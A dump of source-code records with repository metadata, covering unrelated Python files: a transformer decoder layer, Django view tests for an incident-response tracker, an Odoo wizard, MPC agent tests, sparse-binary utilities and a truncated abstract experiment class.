DecoderLayer is made up of self-attention, multi-head attention and feedforward network.
This standard decoder layer is based on the paper "Attention Is All You Need".
Args:
d_model: dimension of model (default: 512)
num_heads: number of attention heads (default: 8)
d_ff: dimension of feed forward network (default: 2048)
dropout_p: probability of dropout (default: 0.3)
ffnet_style: style of feed forward network [ff, conv] (default: ff)
"""
def __init__(
self,
d_model: int = 512, # dimension of model
num_heads: int = 8, # number of attention heads
d_ff: int = 2048, # dimension of feed forward network
dropout_p: float = 0.3, # probability of dropout
ffnet_style: str = 'ff' # style of feed forward network
) -> None:
super(SpeechTransformerDecoderLayer, self).__init__()
self.self_attention = AddNorm(MultiHeadAttention(d_model, num_heads), d_model)
self.memory_attention = AddNorm(MultiHeadAttention(d_model, num_heads), d_model)
self.feed_forward = AddNorm(PositionWiseFeedForwardNet(d_model, d_ff, dropout_p, ffnet_style), d_model)
def forward(
self,
inputs: Tensor, # B x T_input
memory: Tensor, # B x T_input x D_model
non_pad_mask: Optional[Any] = None, # B x T_input
self_attn_mask: Optional[Any] = None, # B x T_input x T_input
memory_mask: Optional[Any] = None # B x T_input x T_output
) -> Tuple[Tensor, Tensor, Tensor]:
output, self_attn = self.self_attention(inputs, inputs, inputs, self_attn_mask)
output *= non_pad_mask
output, memory_attn = self.memory_attention(output, memory, memory, memory_mask)
output *= non_pad_mask
output = self.feed_forward(output)
output *= non_pad_mask
return output, self_attn, memory_attn
|
[
"sh951011@gmail.com"
] |
sh951011@gmail.com
|
232acacec4a343733eb00b2811848b81ae867e9f
|
e3c8f786d09e311d6ea1cab50edde040bf1ea988
|
/Incident-Response/Tools/dfirtrack/dfirtrack_main/tests/ip/test_ip_views.py
|
099cf7ffc43e424cec6cb803e502f9a1d4a4f205
|
[
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
foss2cyber/Incident-Playbook
|
d1add8aec6e28a19e515754c6ce2e524d67f368e
|
a379a134c0c5af14df4ed2afa066c1626506b754
|
refs/heads/main
| 2023-06-07T09:16:27.876561
| 2021-07-07T03:48:54
| 2021-07-07T03:48:54
| 384,988,036
| 1
| 0
|
MIT
| 2021-07-11T15:45:31
| 2021-07-11T15:45:31
| null |
UTF-8
|
Python
| false
| false
| 4,562
|
py
|
from django.contrib.auth.models import User
from django.test import TestCase
from dfirtrack_main.models import Ip
import urllib.parse
class IpViewTestCase(TestCase):
""" ip view tests """
@classmethod
def setUpTestData(cls):
# create object
Ip.objects.create(ip_ip='127.0.0.1')
# create user
User.objects.create_user(username='testuser_ip', password='pRs9Ap7oc9W0yjLfnP2Y')
def test_ip_list_not_logged_in(self):
""" test list view """
# create url
destination = '/login/?next=' + urllib.parse.quote('/ip/', safe='')
# get response
response = self.client.get('/ip/', follow=True)
# compare
self.assertRedirects(response, destination, status_code=302, target_status_code=200)
def test_ip_list_logged_in(self):
""" test list view """
# login testuser
self.client.login(username='testuser_ip', password='pRs9Ap7oc9W0yjLfnP2Y')
# get response
response = self.client.get('/ip/')
# compare
self.assertEqual(response.status_code, 200)
def test_ip_list_template(self):
""" test list view """
# login testuser
self.client.login(username='testuser_ip', password='pRs9Ap7oc9W0yjLfnP2Y')
# get response
response = self.client.get('/ip/')
# compare
self.assertTemplateUsed(response, 'dfirtrack_main/ip/ip_list.html')
def test_ip_list_get_user_context(self):
""" test list view """
# login testuser
self.client.login(username='testuser_ip', password='pRs9Ap7oc9W0yjLfnP2Y')
# get response
response = self.client.get('/ip/')
# compare
self.assertEqual(str(response.context['user']), 'testuser_ip')
def test_ip_list_redirect(self):
""" test list view """
# login testuser
self.client.login(username='testuser_ip', password='pRs9Ap7oc9W0yjLfnP2Y')
# create url
destination = urllib.parse.quote('/ip/', safe='/')
# get response
response = self.client.get('/ip', follow=True)
# compare
self.assertRedirects(response, destination, status_code=301, target_status_code=200)
def test_ip_detail_not_logged_in(self):
""" test detail view """
# get object
ip_1 = Ip.objects.get(ip_ip='127.0.0.1')
# create url
destination = '/login/?next=' + urllib.parse.quote('/ip/' + str(ip_1.ip_id) + '/', safe='')
# get response
response = self.client.get('/ip/' + str(ip_1.ip_id) + '/', follow=True)
# compare
self.assertRedirects(response, destination, status_code=302, target_status_code=200)
def test_ip_detail_logged_in(self):
""" test detail view """
# get object
ip_1 = Ip.objects.get(ip_ip='127.0.0.1')
# login testuser
self.client.login(username='testuser_ip', password='pRs9Ap7oc9W0yjLfnP2Y')
# get response
response = self.client.get('/ip/' + str(ip_1.ip_id) + '/')
# compare
self.assertEqual(response.status_code, 200)
def test_ip_detail_template(self):
""" test detail view """
# get object
ip_1 = Ip.objects.get(ip_ip='127.0.0.1')
# login testuser
self.client.login(username='testuser_ip', password='pRs9Ap7oc9W0yjLfnP2Y')
# get response
response = self.client.get('/ip/' + str(ip_1.ip_id) + '/')
# compare
self.assertTemplateUsed(response, 'dfirtrack_main/ip/ip_detail.html')
def test_ip_detail_get_user_context(self):
""" test detail view """
# get object
ip_1 = Ip.objects.get(ip_ip='127.0.0.1')
# login testuser
self.client.login(username='testuser_ip', password='pRs9Ap7oc9W0yjLfnP2Y')
# get response
response = self.client.get('/ip/' + str(ip_1.ip_id) + '/')
# compare
self.assertEqual(str(response.context['user']), 'testuser_ip')
def test_ip_detail_redirect(self):
""" test detail view """
# get object
ip_1 = Ip.objects.get(ip_ip='127.0.0.1')
# login testuser
self.client.login(username='testuser_ip', password='pRs9Ap7oc9W0yjLfnP2Y')
# create url
destination = urllib.parse.quote('/ip/' + str(ip_1.ip_id) + '/', safe='/')
# get response
response = self.client.get('/ip/' + str(ip_1.ip_id), follow=True)
# compare
self.assertRedirects(response, destination, status_code=301, target_status_code=200)
|
[
"a.songer@protonmail.com"
] |
a.songer@protonmail.com
|
1bb2970dbed9a9c8f76d2ed9a6d205330e6218ef
|
b3858bf912bcdeb6fdf23646d94d2b9cd6e7900a
|
/Candy Race.py
|
63c7d4b1575660a3662429db52355fb201d39a0d
|
[] |
no_license
|
Programmer-Admin/binarysearch-editorials
|
eedf9e253e85324030260d44e798b0ca13645e63
|
12815fe3803cf5392ccfaadd38c7f50e882275c1
|
refs/heads/main
| 2023-02-06T04:59:25.279318
| 2020-12-26T20:45:34
| 2020-12-26T20:45:34
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 378
|
py
|
"""
Candy Race
Apparently you can solve this in 1ms, but here's a memoized recursive solution for your soul.
"""
from functools import lru_cache
class Solution:
def solve(self, candies):
@lru_cache(None)
def dfs(i,j):
if j<i: return 0
return max(candies[i]-dfs(i+1, j), candies[j]-dfs(i,j-1))
return dfs(0, len(candies)-1)>0
|
[
"jimenez.adam0@gmail.com"
] |
jimenez.adam0@gmail.com
|
6eab525395ba4dccbc34669ccc2adea80f44a930
|
98e821fe72b711b5d05dbaa7018541a643950291
|
/edrnsite/collaborations/browser/groupspace.py
|
ef62ca89f22e62fa55a445b1d324247c5276f794
|
[
"Apache-2.0"
] |
permissive
|
EDRN/edrnsite.collaborations
|
e6b0a71a13a6171b9e48de3b8b39979ebb969504
|
2344b3fe2f60e1079823c688968329010d3c67d5
|
refs/heads/master
| 2021-01-18T21:09:51.188644
| 2018-09-05T14:58:42
| 2018-09-05T14:58:42
| 20,818,565
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 444
|
py
|
# encoding: utf-8
# Copyright 2012 California Institute of Technology. ALL RIGHTS
# RESERVED. U.S. Government Sponsorship acknowledged.
'''EDRN Site Collaborations: group space view
'''
from Products.Five.browser import BrowserView
from Products.Five.browser.pagetemplatefile import ViewPageTemplateFile
class GroupSpaceView(BrowserView):
'''Default view for a Group Space.'''
index = ViewPageTemplateFile('templates/groupspace.pt')
|
[
"sean.c.kelly@me.com"
] |
sean.c.kelly@me.com
|
dbd85ec4828daa9922789e8a37df4ddb2a4a6b71
|
e0f4db1f56bce425a1fe53796461b4b77f9f8c72
|
/src/profiles/migrations/0002_auto_20180820_1928.py
|
bba3be33fd8426a98ccba6dbec71351398b86fac
|
[] |
no_license
|
AhmedBafadal/My-Picks
|
a105feacb8d649ce10cee71d6c4308360e221d94
|
21a9143119f9933dcebd53c2fd252a2160ab0e58
|
refs/heads/master
| 2020-03-26T09:50:05.059463
| 2018-08-29T18:54:17
| 2018-08-29T18:54:17
| 144,767,334
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 756
|
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.2 on 2018-08-20 18:28
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('profiles', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='profile',
name='followers',
field=models.ManyToManyField(blank=True, related_name='is_follower', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='profile',
name='following',
field=models.ManyToManyField(blank=True, related_name='is_following', to=settings.AUTH_USER_MODEL),
),
]
|
[
"a.m.bafadal@gmail.com"
] |
a.m.bafadal@gmail.com
|
554020e53113b860b8d0bbd5c0664b43fa6ae211
|
42a7b34bce1d2968079c6ea034d4e3f7bb5802ad
|
/ex51/gothonweb/bin/app.py
|
4cbf3709fa4bf1a85bea1cd83292927e281bb187
|
[] |
no_license
|
linpan/LPTHW
|
45c9f11265b5e1ffe0387a56cec192fa12c6c4d5
|
227bfee3098e8ecb5f07ffc3a0b8e64a853106ce
|
refs/heads/master
| 2021-04-26T13:42:56.859644
| 2014-12-18T15:21:14
| 2014-12-18T15:21:14
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 527
|
py
|
#! /usr/bin/env python
#coding:utf-8
import web
urls = (
'/hello','Index'
)
app = web.application(urls,globals())
render = web.template.render('/usr/local/LPTHW/ex51/gothonweb/templates/',base="layout")
class Index(object):
def GET(self):
return render.hello_form()
def POST(self):
form = web.input(name="Nobody",greet="Hello")
greeting = "%s,%s" % (form.greet,form.name)
return render.index(greeting = greeting)
if __name__ == '__main__':
app.run()
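# Usage sketch (assuming stock web.py behavior): `python app.py` serves on
# 0.0.0.0:8080 by default, and a port can be passed as the first CLI argument,
# e.g. `python app.py 8888`; the form is then at http://localhost:8080/hello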
|
[
"shine_forever@yeah.net"
] |
shine_forever@yeah.net
|
a8ee7e66a35c09736719e1aa3b92405d4f0be455
|
3b11dc40c7d772fffeb4d8683e5c9791c41f6454
|
/addons/product/wizard/product_price_list.py
|
ae6ce2aea495f5f257f7a39ca139f811bc6bf4f2
|
[] |
no_license
|
Jacky-odoo/Ecobank
|
b986352abac9416ab00008a4abaec2b1f1a1f262
|
5c501bd03a22421f47c76380004bf3d62292f79d
|
refs/heads/main
| 2023-03-09T18:10:45.058530
| 2021-02-25T14:11:12
| 2021-02-25T14:11:12
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,082
|
py
|
# -*- coding: utf-8 -*-
# Part of Byte. See LICENSE file for full copyright and licensing details.
from odoo import api, fields, models
class product_price_list(models.TransientModel):
_name = 'product.price_list'
_description = 'Price List'
price_list = fields.Many2one('product.pricelist', 'PriceList', required=True)
qty1 = fields.Integer('Quantity-1', default=1)
qty2 = fields.Integer('Quantity-2', default=5)
qty3 = fields.Integer('Quantity-3', default=10)
qty4 = fields.Integer('Quantity-4', default=0)
qty5 = fields.Integer('Quantity-5', default=0)
@api.multi
def print_report(self):
"""
To get the date and print the report
@return : return report
"""
datas = {'ids': self.env.context.get('active_ids', [])}
res = self.read(['price_list', 'qty1', 'qty2', 'qty3', 'qty4', 'qty5'])
res = res and res[0] or {}
res['price_list'] = res['price_list'][0]
datas['form'] = res
return self.env['report'].get_action([], 'product.report_pricelist', data=datas)
|
[
"francisbnagura@gmail.com"
] |
francisbnagura@gmail.com
|
ca7b25409a21a310db6153351cc71d886ecd96ad
|
66c7b0da6ee27ddce0943945503cdecf199f77a2
|
/hucrl/agent/tests/test_mpc_agent.py
|
a0b361bc8c294920b8fd24c0a2626d18525bcba2
|
[
"MIT"
] |
permissive
|
tzahishimkin/extended-hucrl
|
07609f9e9f9436121bcc64ff3190c966183a2cd9
|
c144aeecba5f35ccfb4ec943d29d7092c0fa20e3
|
refs/heads/master
| 2023-07-09T22:57:28.682494
| 2021-08-24T08:50:16
| 2021-08-24T08:50:16
| 383,819,908
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,789
|
py
|
import copy
import os
import pytest
from rllib.agent import MPCAgent
from rllib.algorithms.mpc import CEMShooting, MPPIShooting, RandomShooting
from rllib.dataset.experience_replay import ExperienceReplay
from rllib.environment import GymEnvironment
from rllib.model.environment_model import EnvironmentModel
from rllib.util.training.agent_training import evaluate_agent
SEED = 0
MAX_ITER = 5
ENVIRONMENT = "VContinuous-CartPole-v0"
env = GymEnvironment(ENVIRONMENT, SEED)
env_model = copy.deepcopy(env)
env_model.reset()
dynamical_model = EnvironmentModel(env_model)
reward_model = EnvironmentModel(env_model, model_kind="rewards")
termination = EnvironmentModel(env_model, model_kind="termination")
GAMMA = 0.99
HORIZON = 5
NUM_ITER = 5
NUM_SAMPLES = 50
NUM_ELITES = 5
KAPPA = 1.0
BETAS = [0.2, 0.8, 0]
memory = ExperienceReplay(max_len=2000, num_steps=1)
value_function = None
@pytest.fixture(params=["random_shooting", "cem_shooting", "mppi_shooting"])
def solver(request):
return request.param
@pytest.fixture(params=[True, False])
def warm_start(request):
return request.param
@pytest.fixture(params=["mean", "zero", "constant"])
def default_action(request):
return request.param
@pytest.fixture(params=[1])
def num_cpu(request):
return request.param
def get_solver(solver_, warm_start_, num_cpu_, default_action_):
if solver_ == "random_shooting":
mpc_solver = RandomShooting(
dynamical_model=dynamical_model,
reward_model=reward_model,
horizon=HORIZON,
gamma=1.0,
num_samples=NUM_SAMPLES,
num_elites=NUM_ELITES,
termination=termination,
terminal_reward=value_function,
warm_start=warm_start_,
default_action=default_action_,
num_cpu=num_cpu_,
)
elif solver_ == "cem_shooting":
mpc_solver = CEMShooting(
dynamical_model=dynamical_model,
reward_model=reward_model,
horizon=HORIZON,
gamma=1.0,
num_iter=NUM_ITER,
num_samples=NUM_SAMPLES,
num_elites=NUM_ELITES,
termination=termination,
terminal_reward=value_function,
warm_start=warm_start_,
default_action=default_action_,
num_cpu=num_cpu_,
)
elif solver_ == "mppi_shooting":
mpc_solver = MPPIShooting(
dynamical_model=dynamical_model,
reward_model=reward_model,
horizon=HORIZON,
gamma=1.0,
num_iter=NUM_ITER,
kappa=KAPPA,
filter_coefficients=BETAS,
num_samples=NUM_SAMPLES,
termination=termination,
terminal_reward=value_function,
warm_start=warm_start_,
default_action=default_action_,
num_cpu=num_cpu_,
)
else:
raise NotImplementedError
return mpc_solver
def test_mpc_solvers(solver, num_cpu):
if num_cpu > 1 and "CI" in os.environ:
return
mpc_solver = get_solver(solver, True, num_cpu, "mean")
agent = MPCAgent(mpc_solver=mpc_solver)
evaluate_agent(
agent, environment=env, num_episodes=1, max_steps=MAX_ITER, render=False
)
def test_mpc_warm_start(solver, warm_start):
mpc_solver = get_solver(solver, warm_start, 1, "mean")
agent = MPCAgent(mpc_solver=mpc_solver)
evaluate_agent(
agent, environment=env, num_episodes=1, max_steps=MAX_ITER, render=False
)
def test_mpc_default_action(solver, default_action):
mpc_solver = get_solver(solver, True, 1, default_action)
agent = MPCAgent(mpc_solver=mpc_solver)
evaluate_agent(
agent, environment=env, num_episodes=1, max_steps=MAX_ITER, render=False
)
|
[
"sebastian.curi@inf.ethz.ch"
] |
sebastian.curi@inf.ethz.ch
|
fbe0ba3fe7398923a4ecff8dc91faf96af99e846
|
28b5eedc39b697186ba9afc42ec544cd0b13c70d
|
/spark/regression/linear_regression.py
|
1619640ed02616968947da8db3b6c2ddc873eeac
|
[] |
no_license
|
arunpa0206/mltrainingtechcovery
|
7915ccac779a186d3f1bfa1f6cebbe5ac2455422
|
ce284c31eefa0468c88c790913532b87a0f77e3a
|
refs/heads/master
| 2022-12-08T23:50:04.415494
| 2021-03-13T08:53:22
| 2021-03-13T08:53:22
| 224,205,026
| 2
| 10
| null | 2022-12-08T02:36:22
| 2019-11-26T13:58:42
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 1,109
|
py
|
# make pyspark importable as a regular library.
import findspark
findspark.init()  # required: locates the Spark installation before pyspark is imported
# create a SparkSession
from pyspark.sql import SparkSession
spark = SparkSession.builder.getOrCreate()
# load data
data = spark.read.csv('./boston_housing.csv', header=True, inferSchema=True)
# create features vector
print(data.head(5))
feature_columns = data.columns[:-1]
# here we omit the final column
from pyspark.ml.feature import VectorAssembler
assembler = VectorAssembler(inputCols=feature_columns,outputCol="features")
data_2 = assembler.transform(data)
# train/test split
train, test = data_2.randomSplit([0.7, 0.3])
# define the model
from pyspark.ml.regression import LinearRegression
algo = LinearRegression(featuresCol="features", labelCol="medv")
# train the model
model = algo.fit(train)
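# quick sanity check (added sketch): a fitted LinearRegressionModel exposes
# its learned parameters via the standard pyspark attributes
print(model.coefficients)
print(model.intercept)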
# evaluation
evaluation_summary = model.evaluate(test)
print("MAE:", evaluation_summary.meanAbsoluteError)
print("RMSE:", evaluation_summary.rootMeanSquaredError)
print("R2:", evaluation_summary.r2)
# predicting values
predictions = model.transform(test)
predictions.select(predictions.columns[13:]).show() # here I am filtering out some columns just for the figure to fit
|
[
"mail_arunn@yahoo.com"
] |
mail_arunn@yahoo.com
|
581e7f1ac73ddc919efb69e776016f838a8ce99e
|
b44b690c96cfbaba35fa3cc32e8da4442adb9fad
|
/Python/1101. The Earliest Moment When Everyone Become Friends.py
|
151cb5ceccfe90d52025d61102662b977a2e5ccc
|
[] |
no_license
|
faisalraza33/leetcode
|
24d610c6884e218719d82a5c79f1695cb6463d68
|
d7cf4ffba14c6f1ff4551634f4002b53dfeae9b7
|
refs/heads/master
| 2022-08-10T02:05:21.932664
| 2022-07-05T09:59:47
| 2022-07-05T09:59:47
| 238,060,131
| 0
| 0
| null | 2020-02-03T20:54:51
| 2020-02-03T20:54:50
| null |
UTF-8
|
Python
| false
| false
| 3,082
|
py
|
# There are n people in a social group labeled from 0 to n - 1. You are given an array logs where logs[i] = [timestamp_i, x_i, y_i] indicates that x_i and y_i will be friends at the time timestamp_i.
# Friendship is symmetric. That means if a is friends with b, then b is friends with a. Also, person a is acquainted with a person b if a is friends with b, or a is a friend of someone acquainted with b.
# Return the earliest time for which every person became acquainted with every other person. If there is no such earliest time, return -1.
#
# Example 1:
#
# Input: logs = [[20190101,0,1],[20190104,3,4],[20190107,2,3],[20190211,1,5],[20190224,2,4],[20190301,0,3],[20190312,1,2],[20190322,4,5]], n = 6
# Output: 20190301
# Explanation:
# The first event occurs at timestamp = 20190101 and after 0 and 1 become friends we have the following friendship groups [0,1], [2], [3], [4], [5].
# The second event occurs at timestamp = 20190104 and after 3 and 4 become friends we have the following friendship groups [0,1], [2], [3,4], [5].
# The third event occurs at timestamp = 20190107 and after 2 and 3 become friends we have the following friendship groups [0,1], [2,3,4], [5].
# The fourth event occurs at timestamp = 20190211 and after 1 and 5 become friends we have the following friendship groups [0,1,5], [2,3,4].
# The fifth event occurs at timestamp = 20190224 and as 2 and 4 are already friends nothing happens.
# The sixth event occurs at timestamp = 20190301 and after 0 and 3 become friends we have that all become friends.
#
# Example 2:
#
# Input: logs = [[0,2,0],[1,0,1],[3,0,3],[4,1,2],[7,3,1]], n = 4
# Output: 3
#
# Constraints:
#
# 2 <= n <= 100
# 1 <= logs.length <= 10^4
# logs[i].length == 3
# 0 <= timestamp_i <= 10^9
# 0 <= x_i, y_i <= n - 1
# x_i != y_i
# All the values timestamp_i are unique.
# All the pairs (x_i, y_i) occur at most one time in the input.
from typing import List
class Solution:
def earliestAcq(self, logs: List[List[int]], n: int) -> int:
# First, we need to sort the events in chronological order.
logs.sort(key=lambda i: i[0])
uf = UnionFind(n)
for ts, x, y in logs:
uf.union(x, y)
if uf.get_count() == 1:
return ts
# More than one groups left, i.e. not everyone is connected.
return -1
class UnionFind:
def __init__(self, size):
self.root = [i for i in range(size)]
self.rank = [1] * size
self.count = size
def find(self, x):
if x == self.root[x]:
return x
self.root[x] = self.find(self.root[x])
return self.root[x]
def union(self, x, y):
rootX = self.find(x)
rootY = self.find(y)
if rootX != rootY:
if self.rank[rootX] > self.rank[rootY]:
self.root[rootY] = rootX
elif self.rank[rootX] < self.rank[rootY]:
self.root[rootX] = rootY
else:
self.root[rootY] = rootX
self.rank[rootX] += 1
self.count -= 1
def get_count(self):
return self.count
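# --- Quick check (added sketch; mirrors Example 2 above) ---
if __name__ == "__main__":
    logs = [[0, 2, 0], [1, 0, 1], [3, 0, 3], [4, 1, 2], [7, 3, 1]]
    print(Solution().earliestAcq(logs, 4))  # expected output: 3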
|
[
"Hongbo.Miao@outlook.com"
] |
Hongbo.Miao@outlook.com
|
e3c31baedb01d6c813d3b7b845d8f3bcb35ed6e2
|
c1c8b0363bb6dd52115c0aad9298b6573a6ba062
|
/sparse_binary_number.py
|
c051e68a78ba80ce4b6058d4bf0ce5a1b3a8b3d7
|
[
"MIT"
] |
permissive
|
beepscore/sparse_binary_number
|
3f5bd50e772c6e3345e8f57d4317c4a7d8e572d7
|
a89c5b04189c5f7015855075222a0ced4a650db7
|
refs/heads/master
| 2021-01-10T20:28:56.885423
| 2015-05-14T18:38:41
| 2015-05-14T18:38:41
| 33,623,410
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,631
|
py
|
#!/usr/bin/env python3
def next_sparse(sparse_number):
"""return next larger sparse number
Keyword arguments:
sparse_number -- a sparse number, as defined by is_sparse
This algorithm uses powers of two. Estimated time complexity >= O(log(n)).
"""
# print("sparse_number 0b{0:b}".format(sparse_number))
# Edge case. Handle explicitly for clarity
if sparse_number == 0:
return 1
power_max = twos_power_max(sparse_number)
for power in range(0, power_max):
# print("power", power)
if is_zero_bit_and_no_neighbor_ones(sparse_number, power):
# print("at middle of 000 change to 010")
return sparse_number + (2 ** power)
if is_right_end_of_001(sparse_number, power):
# print("at right of 001 change to 01 followed by all zeros")
sparse_zeroed_low_bits = (sparse_number >> (power + 1)) * (2 ** (power + 1))
# print("sparse_zeroed_low_bits {0:b}".format(sparse_zeroed_low_bits))
return sparse_zeroed_low_bits + (2 ** (power + 1))
return (2 ** (power_max + 1))
def next_sparse_incremental(sparse_number):
"""return next larger sparse number
Keyword arguments:
sparse_number -- a sparse number, as defined by is_sparse
return None if reached internal limit without finding a next sparse.
This algorithm uses "brute force". Estimated time complexity >= O(n).
Increments until possible_sparse is_sparse or reaches limit.
"""
# limit is arbitrary in Python
# http://stackoverflow.com/questions/5470693/python-number-limit
limit = 2 ** 32
for possible_sparse in range(sparse_number + 1, limit):
if is_sparse(possible_sparse):
return possible_sparse
return None
def is_sparse(number):
"""return True if number binary digit 1s have no adjacent 1s.
Keyword arguments:
number -- an integer >= 0
return True if number is 0b1
"""
if number == 0:
return True
if number == 1:
# edge case. List explicitly for clarity. Define to be True
return True
else:
bits = bits_list(number)
# start power_of_2 at 1 so previous_bit index won't be out of list range
for power_of_2 in range(1, len(bits)):
current_bit = bits[power_of_2]
previous_bit = bits[power_of_2 - 1]
if ((current_bit == 1) and (previous_bit == 1)):
# number has two consecutive 1s
return False
return True
def bits_list(number):
"""return list of bits in number
Keyword arguments:
number -- an integer >= 0
"""
# https://wiki.python.org/moin/BitManipulation
if number == 0:
return [0]
else:
# binary_literal string e.g. '0b101'
binary_literal = bin(number)
        bits_string = binary_literal[2:]  # drop the '0b' prefix (slicing is safer than lstrip('0b'))
# list comprehension
bits = [int(bit_character) for bit_character in bits_string]
return bits
def bit_at_twos_power(number, exponent):
"""return bit in number at location 2 ** exponent
Keyword arguments:
number -- an integer >= 0
exponent -- a integer >= 0
"""
bits = bits_list(number)
# NOTE: reverse() modifies object, returns None
bits.reverse()
if exponent > (len(bits) - 1):
return 0
else:
return bits[exponent]
def twos_power_max(number):
"""return highest power of two in number
Keyword arguments:
number -- an integer >= 0
"""
bits = bits_list(number)
return len(bits) - 1
def is_zero_bit_and_no_neighbor_ones(number, exponent):
if (bit_at_twos_power(number, exponent) == 0
and is_bit_no_neighbor_ones(number, exponent)):
return True
else:
return False
def is_bit_no_neighbor_ones(number, exponent):
if (is_bit_no_right_one(number, exponent)
and is_bit_no_left_one(number, exponent)):
return True
else:
return False
def is_bit_no_right_one(number, exponent):
if (exponent == 0
or bit_at_twos_power(number, exponent - 1) == 0):
return True
else:
return False
def is_bit_no_left_one(number, exponent):
if bit_at_twos_power(number, exponent + 1) == 0:
return True
else:
return False
def is_right_end_of_001(number, exponent):
if (bit_at_twos_power(number, exponent) == 1
and bit_at_twos_power(number, exponent + 1) == 0
and bit_at_twos_power(number, exponent + 2) == 0):
return True
else:
return False
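# --- Illustrative checks (added sketch, not part of the original module) ---
if __name__ == '__main__':
    assert is_sparse(0b101) and not is_sparse(0b110)
    assert next_sparse(0b101) == 0b1000            # 5 -> 8
    assert next_sparse_incremental(0b101) == 0b1000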
|
[
"support@beepscore.com"
] |
support@beepscore.com
|
fb013c9f1fb83d9df51c54bbae2e997159c4c7e8
|
059b43c54e69fdca5419d5565c19cc5cb0114a92
|
/__unported__/sale_order_line_analytic/__openerp__.py
|
9edf7867b2603f7b614f424a96badd02f2aaaa26
|
[] |
no_license
|
caiuka/eficent-odoo-addons
|
b3594b0e4d52594c95bb4cea39fdb47933e77d22
|
458df2c04944688c2273885b5d09fe3753e0ca7e
|
refs/heads/master
| 2020-05-29T11:00:45.273732
| 2014-11-06T13:32:26
| 2014-11-06T13:32:26
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,086
|
py
|
# -*- coding: utf-8 -*-
##############################################################################
#
# Copyright (C) 2014 Eficent (<http://www.eficent.com/>)
# <contact@eficent.com>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
"name": "Purchase Requisition Analytic",
"version": "1.0",
"author": "Eficent",
"website": "www.eficent.com",
"category": "Generic Modules/Projects & Services",
"depends": ["analytic", "purchase_requisition"],
"description": """
Organizations often need to integrate purchase requisitions with projects or contracts,
and to find requisitions by searching by the project/contract code, name or project/contract manager.
This module adds the following features to purchase requisitions:
- Adds the analytic account to the purchase requisition lines,
- When the purchase order is created from the purchase requisition, it copies the analytic account.
- Introduces the possibility to search purchase requisitions by analytic account or by project manager.
- Introduces a new menu entry in Purchasing to list purchase requisition lines.
""",
"init_xml": [
],
"update_xml": [
"purchase_requisition_view.xml",
],
'demo_xml': [
],
'test':[
],
'installable': True,
'active': False,
'certificate': '',
}
|
[
"jordi.ballester@eficent.com"
] |
jordi.ballester@eficent.com
|
ff5dff19f34684d16ef5281dee8f6be0988851a6
|
09652bdf74f8ade0cf56a75c9f716bda9dc6f4ff
|
/server/src/tests/samples/newType2.py
|
31086a4f728f54cbba6821b213aacd9ac83b7663
|
[
"MIT",
"LicenseRef-scancode-generic-cla"
] |
permissive
|
zeronone/pyright
|
b68005063cc3623ae2f572a0fec1d4c7845ec57f
|
d9babcd56b08cb0be024c9d527df333cff5b2b97
|
refs/heads/master
| 2022-11-18T14:04:31.561923
| 2020-07-15T08:49:53
| 2020-07-15T08:49:53
| 278,020,180
| 0
| 0
|
NOASSERTION
| 2020-07-08T07:26:01
| 2020-07-08T07:26:00
| null |
UTF-8
|
Python
| false
| false
| 400
|
py
|
# This sample tests the special-case handle of the multi-parameter
# form of the built-in "type" call.
# pyright: strict
X1 = type("X1", (object,), dict())
X2 = type("X2", (object,), dict())
class A(X1):
...
class B(X2, A):
...
# This should generate an error because the first arg is not a string.
X3 = type(34, (object,))
# This should generate an error because the second arg is not a tuple of class types.
X4 = type("X4", 34)
# This should generate an error because the second arg is not a tuple of class types.
X5 = type("X5", (3,))
|
[
"erictr@microsoft.com"
] |
erictr@microsoft.com
|
a3d8178d3d9cd5166f52ef11be9060f61c192390
|
47e9f6cef4bfedf81a897d972cecfcf4616ae25f
|
/experiments/base_experiment.py
|
0fb506e33939575baf2a0db46f1c3a9691fa894c
|
[] |
no_license
|
wz139704646/MBRL_on_VAEs
|
1d2b141f5a17746ffa527f3852dfe10bc73dcd27
|
b0e8f66b3ade742445a41d3d5667032a931d94d2
|
refs/heads/main
| 2023-04-09T04:35:34.306860
| 2021-04-27T03:59:54
| 2021-04-27T03:59:54
| 323,389,851
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,633
|
py
|
import abc
class BaseExperiment(metaclass=abc.ABCMeta):
"""base class for all kinds of experiments"""
def __init__(self, exp_configs, hook_before_run=None, hook_after_run=None):
"""initialize the experiment
:param exp_configs: the configurations needed in this experiment
:param hook_before_run: hook function run before the main part run,
take the experiment object itself as the only param
:param hook_after_run: hook function run after the main part run,
take the experiment object itself as the only param
"""
self.exp_configs = exp_configs
self.hook_before_run = hook_before_run
self.hook_after_run = hook_after_run
@abc.abstractmethod
def apply_configs(self):
"""apply the configurations"""
pass
@abc.abstractmethod
def before_run(self, **kwargs):
"""preparations needed be done before run the experiment"""
pass
@abc.abstractmethod
def run(self, **kwargs):
"""run the main part of the experiment"""
pass
@abc.abstractmethod
def after_run(self, **kwargs):
"""cleaning up needed be done after run the experiment"""
pass
def exec(self, **kwargs):
"""execute the entire experiment"""
# apply the experiment configuration
self.apply_configs()
self.before_run(**kwargs)
if self.hook_before_run is not None:
self.hook_before_run(self)
self.run(**kwargs)
if self.hook_after_run is not None:
